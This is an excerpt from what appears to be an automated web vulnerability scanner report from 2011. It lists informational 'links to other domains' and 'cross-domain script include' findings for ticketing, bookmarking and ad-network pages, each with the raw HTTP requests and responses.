</script><script language="JavaScript" src="http://cache1.stubhubstatic.com/promotions/scratch/test/s_code_common.js"></script>
...[SNIP]...
rorsMsg" style="border: medium none ; margin: 0pt; clear: none; font: normal 12px arial; color:#222222;">
To use all the features of this page, you'll need to install Adobe flash Player. It's free!
[..<a href="http://www.adobe.com/go/getflashplayer" target="_blank" title="DownloadFlash">Get Flash Player</a>
...[SNIP]...
<noscript><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab" height="210px" id="TDMap" width="200px"><param name="movie" value="http://cache3.stubhubstatic.com/resources/flex/TDMap-1.02.swf"/>
...[SNIP]...
ctionid=221945&amp;staticMap=http://cache1.stubhubstatic.com/data/venue_maps/174027/stubhub_450926_NewMeadowlandsStadium_U2.png&amp;mapVersion=2.0&amp;staticDomainUrl=http://cache3.stubhubstatic.com"/><embed align="middle" allowScriptAccess="sameDomain" bgcolor="#869ca7" flashvars="&amp;venueid=450926&amp;sectionid=221945&amp;staticMap=http://cache1.stubhubstatic.com/data/venue_maps/174027/stubhub_450926_NewMeadowlandsStadium_U2.png&amp;mapVersion=2.0&amp;staticDomainUrl=http://cache3.stubhubstatic.com" height="210px" id="TDMap" loop="false" name="TDMap" play="true" pluginspage="http://www.adobe.com/go/getflashplayer" quality="high" src="http://cache3.stubhubstatic.com/resources/flex/TDMap-1.02.swf" type="application/x-shockwave-flash" width="200px" wmode="opaque"/></object>
...[SNIP]...
<noscript><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab" height="210px" id="TDMap" width="200px"><param name="movie" value="http://cache3.stubhubstatic.com/resources/flex/TDMap-1.02.swf"/>
...[SNIP]...
ctionid=221945&amp;staticMap=http://cache1.stubhubstatic.com/data/venue_maps/174027/stubhub_450926_NewMeadowlandsStadium_U2.png&amp;mapVersion=2.0&amp;staticDomainUrl=http://cache3.stubhubstatic.com"/><embed align="middle" allowScriptAccess="sameDomain" bgcolor="#869ca7" flashvars="&amp;venueid=450926&amp;sectionid=221945&amp;staticMap=http://cache1.stubhubstatic.com/data/venue_maps/174027/stubhub_450926_NewMeadowlandsStadium_U2.png&amp;mapVersion=2.0&amp;staticDomainUrl=http://cache3.stubhubstatic.com" height="210px" id="TDMap" loop="false" name="TDMap" play="true" pluginspage="http://www.adobe.com/go/getflashplayer" quality="high" src="http://cache3.stubhubstatic.com/resources/flex/TDMap-1.02.swf" type="application/x-shockwave-flash" width="200px" wmode="opaque"/></object>
...[SNIP]...
</div><script src="http://cache1.stubhubstatic.com/resources/mojito/js/lib/jquery.bundle.201105231737.min.js" type="text/javascript"></script><script src="http://cache1.stubhubstatic.com/resources/mojito/js/common/stubhub-1.2.js" type="text/javascript"></script><script src="http://cache1.stubhubstatic.com/resources/mojito/js/pattern/phoenix-RC.js" type="text/javascript"></script>
...[SNIP]...
</script><script language="javascript" src="http://cache1.stubhubstatic.com/resources/mojito/js/feature/ticket-1.0.js" type="text/javascript"></script>
...[SNIP]...
<a href="/privacy_policy" title="TRUSTe" target="_blank"><img src="http://cache1.stubhubstatic.com/promotions/scratch/sh/truste_logo_vert.gif" width="40" height="56" style="float:right;padding-right:50px;padding-top:30px;" border="0"></a>
...[SNIP]...
</script><script type="text/javascript" src="http://cache1.stubhubstatic.com/resources/js/third_party/jquery.autocomplete.js"></script>
...[SNIP]...
</div><script src="http://cache1.stubhubstatic.com/promotions/scratch/lt/bubble.min-1.0.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://cache1.stubhubstatic.com/promotions/scratch/lt/geo_ui_v8.2.min.js"></script>
...[SNIP]...
</script><script language="javascript" src="http://cache1.stubhubstatic.com/promotions/scratch/lt/content-1.1.min.js" type="text/javascript"></script>
...[SNIP]...
<noscript><iframe src="https://view.atdmt.com/iaction/sf1stu_UniversalAllPages_4" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe>
...[SNIP]...
</script><script type="text/javascript" src="http://cache1.stubhubstatic.com/promotions/scratch/baynote/baynote.js"></script>
...[SNIP]...

20.92. http://www.stumbleupon.com/submit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /submit

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /submit?url=http%3A%2F%2Fwww.factset.com%2Fproducts%2Fprivateequity&title=Private+Equity%2C+Venture+Capital%2C+Ownership%2C+M%26A%2C+Idea+Screening%2C+Reporting+%7C+FactSet+Research+Systems HTTP/1.1
Host: www.stumbleupon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: su_c=0d1e2bedc0e1135deadbc657c2aa8530%7C%7C10%7C%7C1307312440%7Cb38de0b02793b0d025f256428b4dc8bd; __utmz=189632489.1307312449.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=189632489.866859479.1307275364.1307275364.1307312449.2; __utmv=189632489.|1=user_class=v=1,; su_conf=cfcd208495d565ef66e7dff9f98764da; cmf_i=309046094e1443cb1cc136.64488011; cmf_spr=A%2FN; cmf_sp=http%3A%2F%2Fwww.stumbleupon.com%2Fsubmit

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 48644
Date: Tue, 19 Jul 2011 14:28:25 GMT
Age: 0
Via: 1.1 varnish
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www
...[SNIP]...
<meta name="description" content="Submit a site to StumbleUpon" />
   
   <link rel="stylesheet" href="http://cdn.stumble-upon.com/css/global_su.css?v=20110718-01" type="text/css" media="screen, projection" />
   <!--[if lte IE 6]>
...[SNIP]...
<![endif]-->
       
       
           <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<![endif]-->
   <script type="text/javascript" src="http://cdn.stumble-upon.com/js/plugins_su.js?v=20110718-01"></script>

   <link rel="shortcut icon" href="http://cdn.stumble-upon.com/favicon.ico" />

       
           <title>
...[SNIP]...
<noscript>
                   <img src="http://b.scorecardresearch.com/p?c1=2&c2=7677660&cv=2.0&cj=1" />
               </noscript>
...[SNIP]...
<div id="ff-install-helper" style="display: none;">
               <img id="close-button" src="http://cdn.stumble-upon.com/images/close-button.png" alt="x" />
               <h2>Installing is Easy!<img src="http://cdn.stumble-upon.com/images/s.gif" class="iconArrow24" /></h2>
...[SNIP]...
<div style="padding: 35px 0 200px 320px;" class="clearfix">
                   <img src="http://cdn.stumble-upon.com/i/assets/homePromo1.jpg" height="140" width="278" alt="Discover the best videos from YouTube" class="left" style="margin-left: -300px;"/>
                   <h2 style="padding-top: 15px; margin-bottom: 25px; font-size: 20px;">
...[SNIP]...
<!-- end wrapper -->

   <script type="text/javascript" charset="utf-8" src="http://cdn.stumble-upon.com/js/attach_su.js?v=20110718-01"></script>
...[SNIP]...

20.93. http://www.techexcel.com/products/devsuite/devteststudio.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.techexcel.com
Path:   /products/devsuite/devteststudio.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /products/devsuite/devteststudio.html?gclid=CLL574jNjaoCFchM4AodNRT1yQ HTTP/1.1
Host: www.techexcel.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 35123
Content-Type: text/html
Last-Modified: Mon, 11 Jul 2011 09:00:56 GMT
Accept-Ranges: bytes
ETag: "ac7fbcba93fcc1:a7ae"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 14:20:29 GMT

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
</script><script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script>
...[SNIP]...
</a>| <a href="http://www.twitter.com/techexcel"><img src="/images/twitter.gif" alt="follow us at twitter" width="14" height="14" />
...[SNIP]...

20.94. http://www.ticketmaster.com/event/000043582C516D43  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ticketmaster.com
Path:   /event/000043582C516D43

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /event/000043582C516D43?artistid=736365&majorcatid=10001&minorcatid=1 HTTP/1.1
Host: www.ticketmaster.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-TM-GTM-Origin: tmol-us-ash1
P3P: policyref="/w3c/tmol/p3p.xml", CP="IDC DSP COR CURa ADMa DEVa TAIa PSAa CONo HISa TELo OURDELo UNRo IND PHY ONL UNI PUR COM NAV INT DEM"
Content-Type: text/html; charset=utf-8
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Vary: Accept-Encoding
Content-Length: 154498
Date: Tue, 19 Jul 2011 18:36:25 GMT
Connection: close
Set-Cookie: GEO_OMN=ba; path=/; domain=.ticketmaster.com
Set-Cookie: ORIGIN=; path=/; domain=.ticketmaster.com; expires=Thu Jan 1 00:00:00 1970
Set-Cookie: BRAND=; path=/; domain=.ticketmaster.com; expires=Thu Jan 1 00:00:00 1970


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebo
...[SNIP]...
<br>For venue information, please visit <A HREF="http://www.newmeadowlandsstadium.com" target="_new">www.newmeadowlandsstadium.com</A>
...[SNIP]...
<div class="neutral-block-empty">


<iframe width=536 height=200 marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no bordercolor=#000000 allowtransparency="true" src="http://creatives.as4x.tmcs.net/tmsandbox3a.html?site=tm&adsize=176x200&handle=N&pagepos=580&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&brand=0&eventid=000043582C516D43" style="overflow:hidden"></iframe>
...[SNIP]...
</h2>
<a href="http://www.livenation.com/" target="_blank">Live Nation</a>
<a href="http://www.houseofblues.com/" target="_blank">House of Blues</a> <a href="http://www.ticketweb.com/" target="_blank">TicketWeb</a>
...[SNIP]...
</span><a href="http://www.ticketmaster.ca/" target="_blank">Canada</a>
...[SNIP]...
</a> <a href="http://www.ticketmaster.ie/" target="_blank">Ireland</a> <a href="http://www.ticketmaster.es/" target="_blank">Spain</a>
...[SNIP]...
</a>
<a href="http://www.limos.com" target="_blank" rel="nofollow">Limos.com</a>
<a href="http://www.nba.com/tickets/tickets.html" target="_blank" rel="nofollow">NBA</a>
<a href="http://www.nfl.com/tickets" target="_blank" rel="nofollow">NFL</a>
<a href="http://www.nhl.com/ice/tickets.htm" target="_blank" rel="nofollow">NHL</a>
<a href="http://www.priceline.com/default.asp?refid=PLTICKETMASTER&refclickid=FT_HOMEPAGE" target="_blank" rel="nofollow">Priceline</a>
<a href="http://www.slotix.com/" class="space" target="_blank">SLO VIP Services</a>
...[SNIP]...
</span>
<a href="http://facebook.com/Ticketmaster" id="facebookIcon" target="_blank" rel="nofollow"><img src="http://media.ticketmaster.com/tm/en-us/img/sys/1000/logoFB.png" alt="Follow us on Facebook" /></a>
<a href="http://twitter.com/ticketmaster" id="twitterIcon" target="_blank" rel="nofollow"><img src="http://media.ticketmaster.com/tm/en-us/img/sys/1000/logoTwit.png" alt="Follow us on Twitter" />
...[SNIP]...
<br />OTHER PARTNERS:&nbsp; <a href="http://www.floraflora.com/" target="_blank">Floraflora</a>
<a href="http://www.gifts.com/" target="_blank">Gifts</a>
<a href="http://www.hsn.com/" target="_blank">Online Shopping</a>
<a href="http://www.pronto.com/" target="_blank">Pronto</a>
<a href="http://www.shoebuy.com/" class="space" target="_blank">Shoebuy</a>
...[SNIP]...

21. Cross-domain script include  previous  next
There are 93 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


21.1. http://a.netmng.com/hic/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.netmng.com
Path:   /hic/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /hic/?nm_width=728&nm_height=90&nm_publ=201&nm_c=250&beacon=November2010&url=Undertone&passback&click=http://ads.undertone.com/c?oaparams=2__bannerid=174266__campaignid=28159__zoneid=16565__UTLCA=1__ptm=1671__cb=94bf6c6737ee486194ee917598e78a1c__bk=lolljh__id=2vaimk2c7zwrks2trxj9vaxbr__oadest= HTTP/1.1
Host: a.netmng.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: evo5=wvx6pjzfr7r98%7C%2BnlYsmJbcvmMSIPYbjpC3rVf%2FNXK2pDRLlRQneamR0oY2ufelEARbwlFtAli1twVl67GERkQH1BEyJNfQDCAdW8bJJdwGx%2Bx72u6pRXTwANi6Beus76iSaXBQUCKCnoC0snFuoKsJ5qzJpcDMpx2qcBLog2crxkNjhDFFeEXeATdugS90Jmwiok8RT92i9jRN8yrc1W%2BTcJlzzZBQEEpSL0cBUfs%2FHHXs4XROwTC0YVkHeLVo6j8KalEDz%2FmML3ZPxXEsB6%2BHKAcIO9w6myx2yR5jOkwPmNq1XcUWhjbIlllZncpvd%2BC56omuRGr2X58mMqdyED%2BsBW%2Fj7YUs49CFmstloWVGep%2FjIyglCaCd8FLmA%2F7gYIqTaQ0MX8eMvZO8KS5x1j9LMUlOBdPLH4CeMKOVQIXgtOnt%2FZCG4sbAZVPMV6105R51Zms%2Fd2tRWIj3ZY3%2BnSbpCVlc%2Bsepj2%2Fh7UVOg6Al77Hmgv2rEFVSze45VB54DME%2BSmVDIN%2BhDpD

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:42:55 GMT
Server: Apache/2.2.9
P3P: policyref="http://a.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Sun, 17 Jul 2011 20:42:55 GMT
Last-Modified: Sun, 17 Jul 2011 20:42:55 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: evo5_ii=6twZuywAYrkZnj3PjCGa8UGSBEUzkooZqU43f%2FGiyI1UXu7W6xg6VD2D0wBlPdOTT5OQE4U8evN3fFU06w2erg%3D%3D; expires=Wed, 18-Jan-2012 20:42:55 GMT; path=/
Set-Cookie: evo5_display=Lb7I6%2B93hnCmP8Ly1Y8aIz6mDQ1J3sznCNFCT7eof5ElbvVxhEDm93raeYwzidf%2FQorvxtKsBHYJrrYeSIbRYA%3D%3D; expires=Thu, 23-Jun-44591 20:42:55 GMT; path=/; domain=.netmng.com
Content-Length: 1472
Connection: close
Content-Type: text/html; charset=UTF-8

<IFRAME SRC="http://ad.doubleclick.net/adi/N1558.NetMining/B5146585.127;sz=728x90;pc=[TPAS_ID];ord=1311108175;click=http://ads.undertone.com/c?oaparams=2__bannerid=174266__campaignid=28159__zoneid=165
...[SNIP]...
94bf6c6737ee486194ee917598e78a1c__bk=lolljh__id=2vaimk2c7zwrks2trxj9vaxbr__oadest=;?"WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000"><SCRIPT language="JavaScript1.1"SRC="http://ad.doubleclick.net/adj/N1558.NetMining/B5146585.127;sz=728x90;pc=[TPAS_ID];ord=1311108175;click=http://ads.undertone.com/c?oaparams=2__bannerid=174266__campaignid=28159__zoneid=16565__UTLCA=1__ptm=1671__cb=94bf6c6737ee486194ee917598e78a1c__bk=lolljh__id=2vaimk2c7zwrks2trxj9vaxbr__oadest=;?"></SCRIPT>
...[SNIP]...

21.2. http://a.tribalfusion.com/j.ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /j.ad?site=bostonglobe&adSpace=300x250&tagKey=987828525&th=20001302335&tKey=undefined&size=300x250&flashVer=0&ver=1.20&center=1&url=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&f=1&p=8207455&a=1&rnd=8216825 HTTP/1.1
Host: a.tribalfusion.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/300x250/bg_1064637_61606228?t=1311108266616&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue
Cookie: ANON_ID=a4nWgZbSZdIis9TnMTYekc374qY9Xj09Hp2T2xg64xYZav67kIJkxQEEf2ojK1s35udiFgJ9Zb9lvSiGZa3mRsVG8ESjSPPsTgrsd3WQEVjYA9bNxuX8tU6X2XXJGmO5ZarAZckFWJdf0TR2Zav5FD4XrJ1ZdjbZc5A0po8XJGqLZaF32Aov5WZckUiyDCF4qFuZctawJUmSUByy40hrAuONZbFkUbp8r6ebf5StDBmgC2wc6E7hfApoY5yiDSZdYMZbZb2ZacswQtQfUGotCtpjsM

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=a2nXSoP3rTwoiAyWrVjrMprETAW3VoE9iJ3ZaC9NKjcuSYjAwNoUderTsfhtT7CvHqlhNolZbO3wZb6Pj4CR6BnIoBDy2sqRgXaUv3as0WA1QsjE1GEf9Py6TCc5J5uvjINffJUb8VpXxo3EC0OnVPlJlIZdj8Wbw3Zd8QPACFYZb9BiSfcRlyHZaZcfatO3p6twFN4WI9yhVTroynMZdnfurN7oBm8cZd5aZbBaLZdkK2drax8oHt1ZccxUs8DiE065deiBlyn13J5RFVXrwTHxWFecJ; path=/; domain=.tribalfusion.com; expires=Mon, 17-Oct-2011 20:44:26 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 1147
Expires: 0
Connection: keep-alive

document.write('<script src="http://tag.admeld.com/passback/js/610/bostonglobe/300x250/12/meld.js"><\/script>');
document.write('<script type="text/javascript">\r\nvar TFPix1725274878 = [\r\n
...[SNIP]...

21.3. http://a.tribalfusion.com/j.ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /j.ad?site=bostonglobe&adSpace=728x90&tagKey=987828525&th=20001302335&tKey=undefined&size=728x90&flashVer=0&ver=1.20&center=1&url=http%3A%2F%2Fboston.com%2F&rurl=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&f=1&p=8117328&a=1&rnd=8110671 HTTP/1.1
Host: a.tribalfusion.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: ANON_ID=aNnUgjyg6ANFA7ubQCktbP4HyZd0X4cZcAAm53CYYYBOwVf7ZaYNS5GABWtTBPqnpscefljZcokfbviSJkNC0FL96ZaCniYYS5SnbXZcYFwZd56hLo1qjFtIBYNq9ZaGEvQjB0C4uEKV7RRQZa3O3qjyKF42ZaMEJ4b32BDDZdVMg6tF1IBYw2v0Kk1oO6ZdETRitDNXBoTGFOnxg6Qm2emyb9ysdZdOpagBZdlUBA6RKMem3yjH2tm2TcZbG4aZbrxc

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=aNnWgZbyg6ANFA7ubQBktbP4HyZd0X4cZcAAm53CYYYBOwVf7ZaYNS5GABWtTBPqnpscefljZcokfbviSJkNC0FL96ZaCniYYS5SnbXZcYFwZd56hLo1qjFtIBYNq9ZaGFfQjB0C4uFKV7RRQZa3O3qjygF42ZaMEJ4b32BDDZdVMg6sF1IBYw2v0Kk1oO6ZdETRitDNXBoTGFOnxg6Q62emyb9ysdZdOpagBZdlUBA6RKMgwHPMt1ofr38xf9UMXVrqeZdWOePb28Rqb4pGvWd7; path=/; domain=.tribalfusion.com; expires=Mon, 17-Oct-2011 20:42:54 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 1146
Expires: 0
Connection: keep-alive

document.write('<script src="http://tag.admeld.com/passback/js/610/bostonglobe/728x90/12/meld.js"><\/script>');
document.write('<script type="text/javascript">\r\nvar TFPix1723665946 = [\r\n
...[SNIP]...

21.4. http://ad.doubleclick.net/adi/N1558.NetMining/B5146585.127  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1558.NetMining/B5146585.127

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/N1558.NetMining/B5146585.127;sz=728x90;pc=%5BTPAS_ID%5D;ord=1311108175;click=http://ads.undertone.com/c?oaparams=2__bannerid=174266__campaignid=28159__zoneid=16565__UTLCA=1__ptm=1671__cb=94bf6c6737ee486194ee917598e78a1c__bk=lolljh__id=2vaimk2c7zwrks2trxj9vaxbr__oadest=;? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://a.netmng.com/hic/?nm_width=728&nm_height=90&nm_publ=201&nm_c=250&beacon=November2010&url=Undertone&passback&click=http://ads.undertone.com/c?oaparams=2__bannerid=174266__campaignid=28159__zoneid=16565__UTLCA=1__ptm=1671__cb=94bf6c6737ee486194ee917598e78a1c__bk=lolljh__id=2vaimk2c7zwrks2trxj9vaxbr__oadest=
Cookie: id=2253b03f0e0100a7|1365243/25505/15169|t=1308836888|et=730|cs=002213fd481abe33e2cc59585e

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7171
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 19 Jul 2011 20:43:01 GMT
Expires: Tue, 19 Jul 2011 20:43:01 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Fri Jul 15 10:14:40 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...

21.5. http://bcp.crwdcntrl.net/px  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /px

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /px?Yz03MyZweGlkPTY5MzE%3D HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/4/c=73%7Crand=653530971%7Cpv=y%7Crt=ifr
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=aa8272d1805895ab786afc266fb574e9; aud=ABR4nGNgYGDwU30Ry8DAaOgivDqIwZqBQUCJAQx6wSTPZQh1E0zxVzYwNDAwMK%2BB8KrAPNFEME80ASL4F0xxGIEpscdgimsGWKV4AZgncg6i0g1M8YVBVH4CU7zfILxKiJmHwPp4%2F0Ac8R7MEysC81ilwJTgV4jKnRDtzBDeLojL9kA0dEIE90N43RCV0hDBhRCj%2BcCUQCHEuRBXi4mDNQhdgwQIxHY2XjBH4j6ECgRTkk4QyhHiI1EwJb4PYuZxMCX0DEIVQ4zeAuGVQFSqQrxpCuGtgnjsAFhQwgviJH8gAQCsIzNY; cc=ACN4nGNQSEy0MDI3SjG0MDC1sDRNTDK3MEtMSzYyM0tLMjU3SbVkAAI%2F1Rex%2FzeeOMbAwGjoIrw6CCTGwCPwvY2JgUGSgeE%2FiOsJpBkZGIEMIGZOqLDEJcco%2FdwUp5zAD32cZgr80MYt9%2B0KbjO%2FXcVjpjoeP4TgMfMUTrmEilSccsKqTjjtY%2FAJO5PNwsBwdm8zWFayAagKKG0BpBmBCr5A%2BILfZzMzMCht2Q8WPAukQSZAjAQylAJVnJjhhjBaomrW2mOKWzKtKgBkPYQDcyS69WFnKnCbIPP%2FCD7J04R957%2BrgLCisDMFMIcy4HRooEo0vnBQwC0p%2BL2NGW48umSgSgxhB8qaXeQAKWoBh6QSkAZKwk0COxhNE5Bm4rg4HcwHJwtGYDpRArLl9MtxuzSAdx%2B17PH%2BUoIvuGRwSwYuYqaWI7T2SOC2R2F%2FMz4XihKOFq76Bmq51M36HHIuhNkLzo0gsxX2t%2BN2rH%2F%2BXrya3azP4tbs%2FSUdn2Qabkk5wy24JYXVLPG6SVgNT8nh%2FSUfr%2BackzOBAWkKDkAGxeTvhKMqqJoJVx5kAIbfOsL5P0w4A19aeoNHcgM%2FYQe6WS%2FEbYKb9SLckqE9M%2FHpXI1bMky4El%2BiOkqMq7fjM%2BEwbsl4lt34HFaAWzLR8hzhakV%2BBh8xRboU3mQWz7KHiMpDtZKwotT7soTdrHAJT3h5vbiObAI2axgYuFonUatAClRRwlNEqyjjllRcVkc4QGT%2B7yesKFBFG2%2F8eL24gTtTe724hVtSWcABX7p9hiczr%2F9PjMMN8DSL1IhoFinsv4bbBL6Kt9SKZv%2F8F3hictZNwn4FAEhKFMU%3D

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:26:05 GMT
